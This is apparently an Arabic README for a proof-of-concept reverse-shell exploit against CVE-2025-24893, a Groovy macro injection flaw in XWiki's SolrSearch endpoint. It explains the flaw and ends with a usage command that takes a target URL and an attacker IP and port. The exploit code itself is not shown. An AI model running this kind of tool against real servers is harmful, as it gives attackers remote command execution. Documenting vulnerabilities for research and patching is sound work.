
حمولة شل عكسية لـ CVE-2025-24893
إثبات المفهوم لـ CVE-2025-24893 – ماكرو
<groovy>تنفيذ التعليمات البرمجية عن بُعد في XWiki
مستوحى من إثبات المفهوم الأصلي لـ Artemir
هذا استغلال إثبات مفهوم (PoC) لـ CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في إصدارات معرضة للخطر من XWiki.
يكمن العيب في عدم تعقيم إدخال المستخدم بشكل صحيح داخل نقطة نهاية SolrSearch، والتي تكون عرضة لحقن ماكرو <groovy> غير محمي عبر استعلام تغذية RSS.
يقوم هذا النص البرمجي بحقن حمولة Groovy باستخدام ماكرو async مما يؤدي إلى تنفيذ الأوامر على الخادم، مما يسمح للمهاجم بتشغيل قشرة عكسية تعود إلى نظامه.
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>